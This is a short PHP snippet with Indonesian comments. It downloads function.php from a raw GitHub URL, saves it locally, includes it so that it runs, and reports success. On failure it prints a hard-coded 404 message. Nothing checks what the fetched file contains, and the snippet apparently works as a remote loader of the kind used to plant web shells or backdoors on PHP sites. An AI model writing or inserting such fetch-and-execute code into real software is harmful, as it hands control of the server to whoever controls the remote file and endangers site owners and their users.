// URL yang benar
$url = 'https://raw.githubusercontent.com/anang37/trubuk/main/function.php';

// Ambil konten dari URL
$content = file_get_contents($url);

// Cek apakah berhasil mengambil konten
if ($content !== false) {
// Simpan ke file lokal
file_put_contents('local_file.php', $content);

// Include file lokal
include 'local_file.php';
echo "✅ Berhasil mengambil dan mengeksekusi konten!";
} else {
echo "❌ Gagal mengambil konten dari URL.
";
echo "Status: 404 Not Found
";
echo "Saran: Periksa kembali URL atau pastikan file tersedia di repositori.";
}